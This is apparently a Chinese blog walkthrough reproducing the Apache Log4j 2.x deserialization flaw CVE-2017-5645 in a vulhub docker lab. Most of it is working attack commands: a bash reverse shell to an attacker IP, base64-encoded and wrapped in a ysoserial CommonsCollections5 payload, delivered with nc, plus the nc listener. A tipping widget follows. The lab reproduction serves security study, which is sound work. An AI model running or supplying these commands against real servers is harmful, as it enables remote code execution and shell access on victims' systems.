log4jCVE-2017-5645漏洞复现

本文介绍了Apache Log4j 2.x的一个严重漏洞CVE-2017-5645,该漏洞可能导致任意代码执行。博主_PowerShell通过vulhub环境搭建,详细展示了漏洞复现过程,包括环境启动、 ysoserial工具创建文件命令的执行、getshell等步骤。

操作前提:

       1:kali虚拟机,安装好docker ,进入log4j文件中,进行安装靶场docker-compose up -d

       2:Apache Log4j 2.8.2之 前的2.x版本

       3:虚拟机和主机可以相互ping通。

        

一:漏洞编号:CVE-2017-5645

二:操作步骤:

1:先部署环境下载/ cd  /vulhyb/log4j/CVE-2017-5645.

2:docker ps 查看环境是否开启。

3:下载软件 ysoserial-all.jar   放到kali里--实现bash反弹

       3.1: 编写bash反弹: bash -i >& /dev/tcp/kali IP / 端口 0>&1---转化为Base64编码

      (注意:这里的端口号要和nc 监听的端口要一致)

      3.2:  将上面的Base64编码添加到执行代码中:bash','-c','{echo,Base64编码}|{bash,-i} 

        

      3.3:将上面的编写到ysoserial-all.jar    执行代码中( java -jar ysoserial-all.jarCommonsCollections5 "bash -c  {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,-        d}|{bash,-i}" | nc 172.20.10.9 4712)

         java -jar ysoserial-all.jar CommonsCollections5 "bash -c         {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,-        d}|{bash,-i}" | nc 172.20.10.9 4712

四:在kali里执行nc -lvvp 12345 监听。

4.1:在存放ysoseral-all.jar的地方开启终端 执行上面的命令。

4.2:nc实现监听  --ls 查看是否监听成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值